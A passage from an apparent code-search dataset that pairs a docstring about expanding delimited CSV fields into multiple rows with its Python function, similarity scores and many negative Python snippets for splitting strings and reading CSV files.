mat.group(1).rstrip()\n # group 2 will be ``None`` if we reach the end of the line\n inline = mat.group(2) or ''\n outlist.append(element)\n comma_needed = True\n continue\n # or it's a badly built line\n raise BadLineError('Line is badly built :\\n%s' % self.origline)\n #\n # if we've been called recursively\n # we shouldn't have got this far\n if endchar is not None:\n raise BadLineError('Line is badly built :\\n%s' % self.origline)\n #\n if not found_comma:\n # if we didn't find a comma\n # the value could be a nested list\n if outlist:\n outlist = outlist[0]\n else:\n outlist = ''\n if self.force_list and not isinstance(outlist, list):\n if outlist:\n outlist = [outlist]\n else:\n outlist = []\n if not self.comment:\n if inline:\n raise CommentError('Comment not allowed :\\n%s' % self.origline)\n return outlist\n return outlist, inline", "def listify(item, do_strip=False):\n if not item:\n return []\n elif isinstance(item, list):\n return item\n elif isinstance(item, string_types) and item.count(','):\n if do_strip:\n return [token.strip() for token in item.split(',')]\n else:\n return item.split(',')\n else:\n return [item]", "def f(data: Dict):\n if field in data and isinstance(data[field], List):\n data[field] = \",\".join(data[field])", "def csv_line(input_list):\n good_strings = [csv_friendly_string(x) for x in input_list]\n return string.join(good_strings, \",\") + \"\\n\"", "def _get_data(self, input_data: str) -> None:\n\t\tdata: List[str]\n\t\t# Set data to a single-element list of [\"None\"]\n\t\tif input_data is None:\n\t\t\tself._data = [\"None\"]\n\t\t\treturn\n\t\t# Strip input data to prevent leading/trailing space interfering with type determination\n\t\traw_data: str = input_data.strip()\n\n\t\t# Get separator, or set data to a single-element list before exiting\n\t\tif \",\" in raw_data:\n\t\t\t# Set separator values\n\t\t\tself.sep_char = \",\"\n\t\t\tself.sep_str = \", \"\n\t\telif \"|\" in raw_data:\n\t\t\t# Set separator values\n\t\t\tself.sep_char = \"|\"\n\t\t\tself.sep_str = \" | \"\n\t\telif \" \" in raw_data:\n\t\t\t# Set separator values\n\t\t\tself.sep_char = \" \"\n\t\t\tself.sep_str = \" \"\n\t\telse:\n\t\t\t# If not a list, set to a single-element list, then exit.\n\t\t\tself._data = [raw_data]\n\t\t\treturn\n\n\t\t# Split, then strip whitespace\n\t\tdata = raw_data.split(self.sep_char)\n\t\tfor i in range(len(data)):\n\t\t\tdata[i] = data[i].strip()\n\n\t\t# Return\n\t\tself._data = data", "def parse_csv(csv, as_ints=False):\n items = []\n for val in csv.split(\",\"):\n val = val.strip()\n if val:\n items.append(int(val) if as_ints else val)\n return items", "def to_list(name, default=[], separator=\":\"):\n value = get(name)\n if value is None:\n return list(default)\n return [e.strip() for e in value.split(separator)]", "def read_data_from_csv(csv_file, header=None, **kwargs):\n if os.path.isabs(csv_file) == False:\n path_to_csv = os.path.join(csv_file)\n else:\n path_to_csv = csv_file\n row_list = []\n if \"field_sep\" not in kwargs.keys():\n field_sep = ','\n else:\n field_sep = kwargs.get(\"field_sep\")\n with open(path_to_csv, mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=field_sep, fieldnames=header)\n for record in csv_reader:\n if list(record.values())[0].startswith(\"#\") is not True:\n # IT'S A COMMENT IF IT STARTS WITH \"#\" \n # IF THIS IS YOUR HEADER ROW, SUPPLY A LIST OF COLUMN NAMES WHEN CALLING THE FUNCTION\n row_list.append(record)\n return row_list", "def read_csv(file_name, return_the_header=False, delimiter=',', quote_char='|'):\n with open(file_name, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=delimiter, quotechar=quote_char)\n if return_the_header:\n next(reader) # Skip header row\n data = []\n for row in reader:\n data.append(row)\n return data", "def str2set(string_field, separator=','):\n\n def wrapper(self):\n \"\"\"Decorator wrapper method.\n \"\"\"\n cleaned_data = self.cleaned_data\n\n string_data = cleaned_data.get(string_field)\n\n list_data = []\n for string in string_data.split(separator):\n string_strip = string.strip()\n if string_strip and string_strip not in list_data:\n list_data.append(string_strip)\n\n return list_data\n\n return wrapper", "def expand_rows(row, delimited_fields, expand_row):\n\n # _log.debug('expand_row is {}'.format(expand_row))\n # go through the delimited fields and clean up the rows\n copy_row = copy.deepcopy(row)\n for d in delimited_fields:\n if d in copy_row:\n copy_row[d] = expand_and_normalize_field(copy_row[d], False)\n\n if expand_row:\n new_values = []\n for d in delimited_fields:\n fields = []\n if d in copy_row:\n for value in expand_and_normalize_field(copy_row[d], True):\n fields.append({d: value})\n new_values.append(fields)\n\n # return all combinations of the lists\n combinations = list(itertools.product(*new_values))\n\n new_rows = []\n for c in combinations:\n new_row = copy.deepcopy(copy_row)\n # c is a tuple because of the .product command\n for item in c:\n for k, v in item.items():\n new_row[k] = v\n new_rows.append(new_row)\n\n return new_rows\n else:\n return [copy_row]", "def parse(self):\n result = []\n for field in self.get_fields():\n result.append(field.get_field())\n return result", "def _convert_str_to_list(cls, v: Union[List[str], str]) -> List[str]:\n if isinstance(v, str):\n return v.split(\",\")\n return v # cov: ignore", "def extractFields(line, delim, keepIndices):\n\titems = line.split(delim)\n\tnewLine = []\n\tfor i in keepIndices:\n\t\tnewLine.append(line[i])\n\treturn delim.join(newLine)", "def getSentenceList(row, field):\n\n return list(row[field].sents)", "def parse(\n to_parse: ParsableValues,\n remove_duplicates: bool = True,\n read_files: bool = False,\n domains_to_addrs: bool = False,\n only_addresses: bool = False,\n addrs_to_domains: bool = False,\n only_hostnames: bool = False\n) -> List[str]:\n if isinstance(to_parse, bytes):\n to_parse = to_parse.decode('utf-8')\n\n if isinstance(to_parse, list):\n return normalize(to_parse)", "def convert_line(line):\n line = line.strip().replace(\"]\", \"\").replace(\"[\", \"\")\n return line.split(\",\")", "def listed_data(self, reader):\n result = []\n for line in reader:\n result.append(line)\n return result", "def parse(raw_file, delimiter):\n\t#open csv file\n\topened_file = open(raw_file)\n\t\n\t#read csv file\n\tcsv_data = csv.reader(opened_file,delimiter=delimiter)\n\t\n\t#build parsed data\n\tparsed_data = []\n\t\n\t#define headers\n\tfields = csv_data.next()\n\t\n\t#Iterate over each row of the csv file, zip together field->value pairs\n\tfor row in csv_data:\n\t\tparsed_data.append(dict(zip(fields, row)))\n\t\n\t#close csv file\n\topened_file.close()\n\t\n\treturn parsed_data", "def parse_line(line):\n tok = line.replace('[', '').replace(']', '').split(', ')\n list = [tok[0]]\n tok = tok[1:]\n temp = list\n parse_line_helper(temp, tok)\n return list", "def cdd_convert(string, field=self.field()):\n return [field(x) for x in string.split()]", "def fileSelFieldsRecGen(dirPath, columns, delim=\",\"):\n\tif type(columns) == str:\n\t\tcolumns = strToIntArray(columns, delim)\n\tfor rec in fileRecGen(dirPath, delim):\n\t\textracted = extractList(rec, columns)\n\t\tyield extracted", "def split(value, delimiter):\n return value.split(delimiter)", "def get_csv():\n with requests.Session() as s:\n download = s.get(CSV_URL)\n decoded_content = download.content.decode('utf-8')\n cr = csv.reader(decoded_content.splitlines(), delimiter=',')\n my_list = list(cr)\n return [row[2] for row in my_list[1:]]", "def values_list(self, *args, **kwargs):\n flat = kwargs.pop(\"flat\", False)\n if kwargs:\n raise AttributeError(f\"Unknown kwargs: {kwargs}\")\n if flat and len(args) != 1:\n raise ValueError(\"flat=True requires exactly one field name\")\n try:\n only_fields = tuple(self._get_field_path(arg) for arg in args)\n except ValueError as e:\n raise ValueError(f\"{e.args[0]} in values_list()\")\n new_qs = self._copy_self()\n new_qs.only_fields = only_fields\n new_qs.return_format = self.FLAT if flat else self.VALUES_LIST\n return new_qs", "def read_csv_to_list(csv_path):\n\n with open(csv_path, newline=\"\") as f:\n reader = csv.reader(f)\n data = list(reader)\n\n return data", "def explode(delim, val, limit = None): \n if limit != None:\n return val.split(delim, limit)\n else:\n return val.split(delim)", "def getList(self,section,option,sep=\";\"):\n value=ConfigParser.SafeConfigParser.get(self,section,option)\n value=value.strip('\"')\n vallist=value.split(sep)\n return vallist", "def read_sample_csv(self):\n f = open('sample.csv')\n lines = f.readline()\n fields = lines.split(',')\n fieldnames_lst = [i.strip() for i in fields]\n f.close()\n return fieldnames_lst", "def parse(raw_file, delimiter):\n\n opened_file = open(raw_file, 'rU')\n csv_data = csv.reader(opened_file, delimiter=delimiter)\n\n parsed_data = []\n\n fields = csv_data.next()\n\n for row in csv_data:\n parsed_data.append(dict(zip(fields,row)))\n\n opened_file.close()\n\n return parsed_data", "def process_data(data, enc=None, delim=None):\n if enc is None:\n enc = detect_encoding(data)\n if delim is None:\n delim = csv_sniff(data[0], enc)\n csv_data = []\n if sys.version_info.major < 3:\n csv_obj = csv.reader(data, delimiter=delim.encode(enc))\n for row in csv_obj:\n row = [str(x, enc) for x in row]\n csv_data.append(row)\n else:\n data = [i.decode(enc) for i in data]\n csv_obj = csv.reader(data, delimiter=delim)\n for row in csv_obj:\n csv_data.append(row)\n return pad_data(csv_data)", "def fileSelFieldValueGen(dirPath, column, delim=\",\"):\n\tfor rec in fileRecGen(dirPath, delim):\n\t\tyield rec[column]", "def getlist(x, y):\n return get(x, y).split(',')", "def _read_csv(cls, input_file, quotechar=None):\n with open(input_file, \"r\", encoding=\"utf-8-sig\") as f:\n return list(csv.reader(f, delimiter=\"\\n\", quotechar=quotechar))", "def read_csv(csv_file_path):\n res = [] #list\n # f = open(csv_file_path) #read file\n with open(csv_file_path,\"r\") as f:", "def parse_list(value: str) -> list[str]:\n segments = _QUOTED_SEGMENT_RE.findall(value)\n for segment in segments:\n left, match, right = value.partition(segment)\n value = ''.join([left, match.replace(',', '\\000'), right])\n return [_dequote(x.strip()).replace('\\000', ',') for x in value.split(',')]", "def _extract(self, row):\n if not self._head:\n self._head = self._create_head(row)\n if self._args.head:\n return\n\n if 'extract' not in self._state:\n self._state['extract'] = self._replace_fields(self._args.extract)\n\n r = list(map(self._convert, row))\n return eval(self._state['extract'])", "def getList(self,section, option): \n unparsedOption=self.get(section, option)\n if unparsedOption.find(',')>0:\n splittedValue=unparsedOption.split(',')\n strippedValue=[]\n while splittedValue:\n valuePart=splittedValue.pop(0)\n strippedValue.append(valuePart.strip())\n result=strippedValue\n else: result=unparsedOption\n return result", "def CSV(id_poke):\r\n poke = [] #creer une liste vide\r\n with open('BDD/pokemon.csv') as csv_file: #ouvre le fichier pokemon.csv\r\n csv_reader = csv.reader(csv_file, delimiter=',') #place les lignes du csv dans une variable\r\n for row in csv_reader: #parcours des lignes du csv\r\n if row[0] == str(id_poke): #si l'id de la ligne = id du pokemon\r\n poke = list(row) #variable = ligne correspondante dans le csv\r\n return(poke) #retourne une liste avec les caracteristiques du poke\r", "def values(line):\n return [v.strip() or None for v in text(line).split(',')]", "def decode_csv(records,\n record_defaults,\n field_delim=\",\",\n use_quote_delim=True,\n name=None,\n na_value=\"\",\n select_cols=None):\n return decode_csv_v2(\n records, record_defaults,\n field_delim, use_quote_delim,\n na_value, select_cols, name\n )", "def serialize_field(field: str) -> Callable[[Dict], None]:\n\n def f(data: Dict):\n \"\"\"\n Serialize specific field of type list\n \"\"\"\n if field in data and isinstance(data[field], List):\n data[field] = \",\".join(data[field])\n\n return f", "def split_line(line):\n if ',' in line:\n return [a.strip() for a in line.split(',')]\n return line.split()", "def parse_protein_ids(csv_field, sep=\"<|>\"):\n clean = csv_field.replace(\"decoy_\", \"\").strip()\n prot_id_set = set(clean.split(sep))\n return prot_id_set", "def convert_comma_separated_str_to_list(input_str: str, trim: bool = True) -> List[str]:\n comma_separated_str = input_str.strip() if trim else input_str\n if not comma_separated_str:\n return []\n\n result = []\n for part_str in comma_separated_str.split(\",\"):\n value = part_str\n if trim:\n value = value.strip()\n if not value:\n continue\n result.append(value)\n return result", "def field_from_native(self, data, files, field_name, into):\n if field_name in data:\n data = data.copy()\n try:\n # data is a querydict when using forms\n data[field_name] = ','.join(data.getlist(field_name))\n except AttributeError:\n data[field_name] = ','.join(data[field_name])\n return super(MultiSelectField, self).field_from_native(data, files, field_name, into)", "def loadCSVFile (file, sep=\";\"):\n lst = lt.newList(\"ARRAY_LIST\") #Usando implementacion arraylist\n #lst = lt.newList() #Usando implementacion linkedlist\n print(\"Cargando archivo ....\")\n t1_start = process_time() #tiempo inicial\n dialect = csv.excel()\n dialect.delimiter=sep\n try:\n with open(file, encoding=\"utf-8\") as csvfile:\n spamreader = csv.DictReader(csvfile, dialect=dialect)\n for row in spamreader: \n lt.addLast(lst,row)\n except:\n print(\"Hubo un error con la carga del archivo\")\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n return lst", "def process_list_arg(arg):\n if isinstance(arg, list):\n return arg\n elif isinstance(arg, basestring):\n args = []\n for part in arg.split(\",\"):\n args.append(part.strip())\n return args", "def FE_split_one_field_into_many(df_in, field, splitter, filler, new_names_list='', add_count_field=False):\r\n df_field = df_in[field].values\r\n df = copy.deepcopy(df_in)\r\n ### First copy whatever is in that field so we can save it for later ###\r\n df[field].fillna(filler, inplace=True)\r\n if add_count_field:\r\n ### there will be one extra field created when we count the number of contents in each field ###\r\n max_things = df[field].map(lambda x: len(x.split(splitter))).max() + 1\r\n else:\r\n max_things = df[field].map(lambda x: len(x.split(splitter))).max()\r\n if len(new_names_list) == 0:\r\n print(' Max. columns created by splitting %s field is %d.' %(\r\n field,max_things))\r\n else:\r\n if not max_things == len(new_names_list):\r\n print(\"\"\" Max. columns created by splitting %s field is %d but you have given %d \r\n variable names only. Selecting first %d\"\"\" %(\r\n field,max_things,len(new_names_list),len(new_names_list)))\r\n ### This creates a new field that counts the number of things that are in that field.\r\n if add_count_field:\r\n #### this counts the number of contents after splitting each row which varies. Hence it helps.\r\n num_products_viewed = 'Content_Count_in_'+field\r\n df[num_products_viewed] = df[field].map(lambda x: len(x.split(splitter))).values\r\n ### Clean up the field such that it has the right number of split chars otherwise add to it\r\n ### This fills up the field with empty strings between each splitter. You can't do much about it.\r\n #### Leave this as it is. It is not something you can do right now. It works.\r\n fill_string = splitter + filler\r\n df[field] = df[field].map(lambda x: x+fill_string*(max_things-len(x.split(splitter))) if len(\r\n x.split(splitter)) < max_things else x)\r\n ###### Now you create new fields by split the one large field ########\r\n if isinstance(new_names_list, str):\r\n if new_names_list == '':\r\n new_names_list = [field+'_'+str(i) for i in range(1,max_things+1)]\r\n else:\r\n new_names_list = [new_names_list]\r\n ### First fill empty spaces or NaNs with filler ###\r\n df.loc[df[field] == splitter, field] = filler\r\n for i in range(len(new_names_list)):\r\n try:\r\n df[new_names_list[i]] = df[field].map(lambda x: x.split(splitter)[i]\r\n if splitter in x else filler)\r\n except:\r\n df[new_names_list[i]] = filler\r\n continue\r\n ### there is really nothing you can do to fill up since they are filled with empty strings.\r\n #### Leave this as it is. It is not something you can do right now. It works.\r\n df[field] = df_field\r\n return df, new_names_list", "def from_csv(value_string):\n if not value_string:\n return []\n if value_string[0] == \"[\" and value_string[-1] == \"]\":\n value_string = value_string[1:-1]\n else:\n # This is a single string entry, any comma contained\n # is part of the value and must not be used to\n # split up the string.\n return [value_string]\n\n if not value_string:\n return []\n stream = StringIO(value_string)\n stream.seek(0)\n reader = csv.reader(stream, dialect=\"excel\")\n return list(reader)[0]" ]
[ "0.63519025", "0.63037026", "0.6226924", "0.621855", "0.621855", "0.605141", "0.60084903", "0.5960452", "0.5954665", "0.58187693", "0.58148223", "0.57171553", "0.56535655", "0.5637533", "0.56276727", "0.55754817", "0.55633485", "0.55611026", "0.54911935", "0.54818034", "0.5430281", "0.5391499", "0.53894114", "0.53786707", "0.5367213", "0.53666645", "0.53438616", "0.5327231", "0.5324738", "0.53171015", "0.53170305", "0.53140706", "0.5305187", "0.52955633", "0.5285228", "0.5266653", "0.52626544", "0.526045", "0.5254531", "0.5248107", "0.5243873", "0.5243873", "0.5229397", "0.5225766", "0.52160716", "0.52085876", "0.5204675", "0.5195257", "0.5192806", "0.51925135", "0.5184019", "0.5179823", "0.5179075", "0.5179071", "0.5172168", "0.515167", "0.51375014", "0.5135567", "0.5126202", "0.51170206", "0.5099442", "0.50990057", "0.5097474", "0.5095433", "0.5094593", "0.50940555", "0.50789267", "0.50685006", "0.5067387", "0.5063081", "0.5059276", "0.50583076", "0.50477326", "0.5047469", "0.50462514", "0.50406784", "0.5032209", "0.5020735", "0.5014433", "0.50099534", "0.50059706", "0.50058216", "0.5003467", "0.499986", "0.49985647", "0.49979404", "0.4997908", "0.49972206", "0.49890366", "0.4984606", "0.49837053", "0.4972733", "0.49716845", "0.49692497", "0.49631852", "0.49612883", "0.49584192", "0.4957266", "0.49524763", "0.4950249" ]
0.7508108
0
Take a row and a field which may have delimited values and convert into a list of new rows with the same data expect for the replaced delimited value.
def expand_rows(row, delimited_fields, expand_row): # _log.debug('expand_row is {}'.format(expand_row)) # go through the delimited fields and clean up the rows copy_row = copy.deepcopy(row) for d in delimited_fields: if d in copy_row: copy_row[d] = expand_and_normalize_field(copy_row[d], False) if expand_row: new_values = [] for d in delimited_fields: fields = [] if d in copy_row: for value in expand_and_normalize_field(copy_row[d], True): fields.append({d: value}) new_values.append(fields) # return all combinations of the lists combinations = list(itertools.product(*new_values)) new_rows = [] for c in combinations: new_row = copy.deepcopy(copy_row) # c is a tuple because of the .product command for item in c: for k, v in item.items(): new_row[k] = v new_rows.append(new_row) return new_rows else: return [copy_row]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def processRow(self, row):\n\t\tif self.delim is not None:\n\t\t\trowArr = row.split(self.delim)\n\t\t\tmsg = \"row does not have expected number of columns found \" + str(len(rowArr)) + \" expected \" + str(self.rowSize)\n\t\t\tassert len(rowArr) == self.rowSize, msg\n\t\telse:\n\t\t\trowArr = row\n\t\t\t\n\t\tnewRowArr = []\n\t\tfor i in range(len(rowArr)):\n\t\t\tcurVal = rowArr[i]\n\t\t\tif (i in self.catValues):\n\t\t\t\tvalues = self.catValues[i]\n\t\t\t\tfor val in values:\n\t\t\t\t\tif val == curVal:\n\t\t\t\t\t\tnewVal = self.trueVal\n\t\t\t\t\telse:\n\t\t\t\t\t\tnewVal = self.falseVal\n\t\t\t\t\tnewRowArr.append(newVal)\n\t\t\telse:\n\t\t\t\tnewRowArr.append(curVal)\n\t\tassert len(newRowArr) == self.newRowSize, \"invalid new row size \" + str(len(newRowArr)) + \" expected \" + str(self.newRowSize)\n\t\tencRow = self.delim.join(newRowArr) if self.delim is not None else newRowArr\n\t\treturn encRow", "def __parseCsvRow(row):\r\n \r\n resultRow = []\r\n for item in row:\r\n if type(item) is str:\r\n if \".\" in item:\r\n try:\r\n f = float(item)\r\n resultRow.append(f)\r\n except ValueError:\r\n resultRow.append(item)\r\n else:\r\n try:\r\n i = int(item)\r\n resultRow.append(i)\r\n except ValueError:\r\n resultRow.append(item)\r\n else:\r\n resultRow.append(item)\r\n return resultRow", "def clean_row(row,i):\n # convert string\n char_array = np.array(list(row))\n\n #insert entry dividers, then split by them\n div_ix = (\n np.array([6, 34, 48, 51, 54, 60, 64, 67, 72, 80, 86, 94, 100,\n 107, 112, 119, 125, 137, 141, 145, 156]),\n )\n char_array[div_ix] = ','\n new_csv_row = (''.join(char_array)).split(',')\n\n # remove excess whitespace surrounding data\n new_csv_row = np.array([entry.strip() for entry in new_csv_row])\n\n return new_csv_row", "def parse_and_flatten(df, field_name):\n\n # Parse and flatten the list\n lst = list(df[field_name])\n lst = [x.split('|') for x in lst]\n\n lst_flat = []\n for slist in lst:\n for x in slist:\n lst_flat.append(x)\n return lst_flat", "def expand_and_normalize_field(field, return_list=False):\n\n if isinstance(field, basestring):\n field = field.rstrip(';:,')\n data = [_normalize_expanded_field(r) for r in re.split(\",|;|:\", field)]\n if return_list:\n return data\n else:\n return \";\".join(data)\n else:\n if return_list:\n return [field]\n else:\n return field", "def map_field_value(\n row: DLCSRecord, field_name: str, config: typing.Dict\n) -> typing.Any:\n mapping: mapper.MappigDictValue = mapper.FIELD_MAPPING[field_name]\n\n if mapping is None:\n return None\n\n if callable(mapping):\n return mapping(row)\n\n if isinstance(mapping, str):\n mapping = [mapping]\n\n if not isinstance(mapping, typing.Collection):\n raise TypeError(\n f\"FIELD_MAPPING[field_name] must be iterable, unless it is None, Callable, or a string.\"\n )\n\n output: typing.List[str] = []\n for csv_field in mapping:\n input_value = row.get(csv_field)\n if input_value:\n if isinstance(input_value, str):\n output.extend(input_value.split(\"|~|\"))\n else:\n output.append(input_value)\n\n bare_field_name = get_bare_field_name(field_name)\n if bare_field_name in config.get(\"controlled_fields\", {}):\n terms = config[\"controlled_fields\"][bare_field_name][\"terms\"]\n output = [terms.get(value, value) for value in output]\n\n return [value for value in output if value] # remove untruthy values like ''", "def ConvertRow(self, row):\n i = 0\n data = []\n for entry in row['f']:\n data.append(self.Convert(entry['v'], self.schema[i]))\n i += 1\n return tuple(data)", "def parse_row(input_row, parsers):\n\n return [parser(value) if parser is not None else value\n for value, parser in zip(input_row, parsers)]", "def _parse_row(row: str):\n final_row = []\n for char in row:\n\n # any number N expands into N spaces\n if char in \"12345678\":\n for i in range(int(char)):\n final_row.append(EMPTY_SPACE)\n else:\n final_row.append(char)\n\n return final_row", "def _convert_row(self, row) :\n\n self.row_id += 1\n data = [self.row_id]\n\n if type(row) == type({}) :\n data.extend(row.get(col, None) for col in self.cols[1:])\n elif type(row) in [type([]), type(())] :\n data.extend(row)\n elif type(row) == RowReference :\n data.extend(row.values())\n else :\n raise Exception(\n 'Don''t know how to add row from: %s ' % str(row)\n )\n\n if len(data) != len(self.cols) :\n raise Exception(\n 'Wrong number of values for new row with cols %s: %s' % \n (str(self.cols), str(data))\n \n )\n\n return data", "def csv_line(value_parser):\n def convert(string):\n return list(map(value_parser, string.split(',')))\n return convert", "def lst_to_field(table, field, lst):\n if len(lst) == 0:\n message(\"No values to add to '{}'.\".format(field))\n elif field_exists(table, field): \n with arcpy.da.UpdateCursor(table, [field]) as cursor:\n # For row in cursor:\n for i, row in enumerate(cursor):\n row[0] = lst[i]\n cursor.updateRow(row)\n else:\n message(\"{} field not found in {}\".format(field, table))", "def rebuild_row(lst, is_collocation):\n split_list = lst[0].split(\"\\t\")\n if is_collocation:\n return [split_list[0] + \" \" + split_list[1], \"1\"]\n return [split_list[0] + \" \" + split_list[1], \"0\"]", "def _read_delimited_field(d):\n val = []\n val.append(next(d))\n while val[-1] != FIELD_DELIMITER:\n try:\n val.append(next(d))\n except StopIteration: break\n\n modlogger.debug( \"read:%s\"%val[:-1])\n return field_ctor(val[:-1])", "def parse_row(input_row, parsers):\n return [try_or_none(parser)(value) if parser is not None else value\n for value, parser in zip(input_row, parsers)]", "def expand_row(\n row: Sequence[Union[str, Sequence[Union[str, Sequence[str]]]]]\n) -> List[List[str]]:\n elems_as_lists = []\n for elem in row:\n if isinstance(elem, list):\n elems_as_lists.append(elem)\n else:\n elems_as_lists.append([elem])\n aligned = [list(i) for i in zip_longest(*elems_as_lists, fillvalue=\"\")]\n return aligned", "def fake_clean_row(row):\n\treturn row", "def rows_to_list(records):\n raw_list = []\n for record in records:\n items = record.items()\n raw_list.append({i[0]: i[1].rstrip() if type(\n i[1]) == str else i[1] for i in items})\n\n # Process data for compounding flag to be boolean since SQLite does not have a boolean type\n processed_list = []\n for row in raw_list:\n if 'compounding_flag' in row:\n if row['compounding_flag'] == '1':\n row['compounding_flag'] = True\n else:\n row['compounding_flag'] = False\n processed_list.append(row)\n\n # If processed list is empty, no processing was done, just assign raw list\n if not processed_list:\n processed_list = raw_list\n\n return processed_list", "def format_row(row):\n assert isinstance(row,list)\n \n data_row=[0]*len(header) #Formatted data row to be output and appeneded to 'data'\n \n for i in [0,1,11,13,14,15,16,17,19,20,21,28,31,45,46,47,48]: data_row[i]=row[i] #emptry string will NOT return None\n for i in [2,3,12,18]: data_row[i]=type_cast(lambda x: int(float(x)),row[i])\n for i in [6,7,8,9,10,23,24,25,26,27,29,30]: data_row[i]=type_cast(float,row[i])\n for i in [4,5,22]: data_row[i]=type_cast(datetime.strptime,row[i],'%Y-%m-%d %H:%M:%S')\n for i in range(32,45):\n if row[i]=='False': data_row[i]=False #bool('False') returns True!\n elif row[i]=='True': data_row[i]=True\n else: data_row[i]=None\n return data_row", "def transform(input):\n transformed_file = []\n\n for row in input:\n names = row['name'].split()\n row['fname'] = names[0]\n row['lname'] = names[1]\n del row['name']\n transformed_file.append(row)\n return transformed_file", "def parse_row(input_row, parsers):\n\n return [try_or_none(parser)(value) if parser is not None else value\n for value, parser in zip(input_row, parsers)]", "def parse_rows(self, rows):\r\n rows = [\r\n (row_id, parse_date(created), student_module_id)\r\n for row_id, created, student_module_id in rows\r\n ]\r\n return rows", "def _convert_field_type(row):\n return row", "def process_row(self, row: Union[List[dict], dict]) -> List[dict]:\n rows = listify(row)\n rows = self.do_pre_row(rows=rows)\n row_return = [{\"internal_axon_id\": row[\"internal_axon_id\"]} for row in rows]\n rows = self.do_row(rows=rows)\n self.write_rows(rows=rows)\n del rows, row\n return row_return", "def process_row(self, table, row):\n for index, column in enumerate(table.columns):\n hash_key = hash(frozenset(column.items()))\n column_type = self.column_types[hash_key] if hash_key in self.column_types else self.column_type(column)\n if row[index] == None and ('timestamp' not in column_type or not column['default']):\n row[index] = '\\N'\n elif row[index] == None and column['default']:\n if self.tz:\n row[index] = '1970-01-01T00:00:00.000000' + self.tz_offset\n else:\n row[index] = '1970-01-01 00:00:00'\n elif 'bit' in column_type:\n row[index] = bin(ord(row[index]))[2:]\n elif isinstance(row[index], (str, unicode, basestring)):\n if column_type == 'bytea':\n row[index] = Binary(row[index]).getquoted()[1:-8] if row[index] else row[index]\n elif 'text[' in column_type:\n row[index] = '{%s}' % ','.join('\"%s\"' % v.replace('\"', r'\\\"') for v in row[index].split(','))\n else:\n row[index] = row[index].replace('\\\\', r'\\\\').replace('\\n', r'\\n').replace(\n '\\t', r'\\t').replace('\\r', r'\\r').replace('\\0', '')\n elif column_type == 'boolean':\n # We got here because you used a tinyint(1), if you didn't want a bool, don't use that type\n row[index] = 't' if row[index] not in (None, 0) else 'f' if row[index] == 0 else row[index]\n elif isinstance(row[index], (date, datetime)):\n if isinstance(row[index], datetime) and self.tz:\n try:\n if row[index].tzinfo:\n row[index] = row[index].astimezone(self.tz).isoformat()\n else:\n row[index] = datetime(*row[index].timetuple()[:6], tzinfo=self.tz).isoformat()\n except Exception as e:\n print e.message\n else:\n row[index] = row[index].isoformat()\n elif isinstance(row[index], timedelta):\n row[index] = datetime.utcfromtimestamp(_get_total_seconds(row[index])).time().isoformat()\n else:\n row[index] = AsIs(row[index]).getquoted()", "def __parse_string_for_delimiter__(self, data):\n parsed = []\n for row in data:\n row = self.__remove_break_line__(row)\n row = self.__split_for_delimiter__(row)\n parsed.append(row)\n return parsed", "def process_data(data, enc=None, delim=None):\n if enc is None:\n enc = detect_encoding(data)\n if delim is None:\n delim = csv_sniff(data[0], enc)\n csv_data = []\n if sys.version_info.major < 3:\n csv_obj = csv.reader(data, delimiter=delim.encode(enc))\n for row in csv_obj:\n row = [str(x, enc) for x in row]\n csv_data.append(row)\n else:\n data = [i.decode(enc) for i in data]\n csv_obj = csv.reader(data, delimiter=delim)\n for row in csv_obj:\n csv_data.append(row)\n return pad_data(csv_data)", "def tidy_split(df, column, sep='|', keep=False):\r\n indexes = list()\r\n new_values = list()\r\n df = df.dropna(subset=[column])\r\n for i, presplit in enumerate(df[column].astype(str)):\r\n values = presplit.split(sep)\r\n if keep and len(values) > 1:\r\n indexes.append(i)\r\n new_values.append(presplit)\r\n for value in values:\r\n indexes.append(i)\r\n new_values.append(value)\r\n new_df = df.iloc[indexes, :].copy()\r\n new_df[column] = new_values\r\n return new_df", "def _parsecsv(x):\n for line in x:\n # decode as utf-8, whitespace-strip and split on delimiter\n yield line.decode('utf-8').strip().split(config.DELIMITER)", "def tidy_split(df, column='Members', sep=', '):\n\n indexes = []\n new_values = []\n for i, presplit in enumerate(df[column].astype(str)):\n for value in presplit.split(sep):\n indexes.append(i)\n new_values.append(value)\n new_df = df.iloc[indexes, :].copy() # the .copy() Prevents a warning\n new_df[column] = new_values\n df = new_df.reset_index(drop=True)\n return df", "def mapper_data_cleaning(self, l, line):\n lineitems = line.split(\",\")\n yield (lineitems[0], lineitems[2])", "def convert(row):\n\n for k,v in row.iteritems():\n if isinstance(v, str):\n if v.isdigit():\n row[k] = int(v)\n elif re.match(r'^\\d+[,\\.]\\d+$', v):\n row[k] = float(v)\n return row", "def clean_rows(reader):\n return [[a.strip() for a in row] for row in reader if row]", "def from_csv_line(line):\r\n return line.strip().split(',')", "def parse_row(row):\n var = row[:5].strip()\n row = row.rstrip('\\n')\n vals = []\n for i in range(5, len(row)-1,3):\n val = row[i:i+3].strip()\n if ('/' in val):\n vals[-1] = None\n vals.append(row[i-3:i+3].strip())\n elif val != '':\n vals.append(row[i:i+3].strip())\n else:\n vals.append(None)\n return var, vals", "def row_from_chunks(chunks):\n # Some values migh have commas in then. In that case we re-concatenate\n # chunks between quotes\n merging = False\n merged_value = ''\n quote = None # Record quote as '\\'' and look for this as the end quote also.\n row = []\n for chunk in chunks:\n # Important that we are not already merging, i do not restart - this is\n # an edge case actually gives an error in our data..\n if chunk.startswith('\\'') and not merging:\n merging = True\n quote = chunk[0]\n merged_value += chunk\n elif merging:\n merged_value += chunk\n else:\n row.append(chunk)\n\n # If the chunk ends with a quote, append the merged value to the row, and stop mergin\n # At this point, if merging is True, quote should not be None, if so, we would just like\n # things to blow up here\n if merging and chunk.endswith(quote):\n merging = False\n quote = None\n row.append(merged_value)\n return row", "def string_split_2d(data, field_delimiter=',', line_delimiter='\\n'):\n return [line.split(field_delimiter) for line in data.split(line_delimiter)]", "def wrap_row(row, col_widths, hyphen_break=False, field_sep=' | ',\n break_chrs=''):\n assert len(row) == len(col_widths)\n # Broken fields (padded)\n broken_fields = [\n wrap(field, width, hyphen_break=hyphen_break, break_chrs=break_chrs)\n for field, width in zip(row, col_widths)\n ]\n # Transpose & join each broken line\n return '\\n'.join(\n field_sep.join(line) for line in 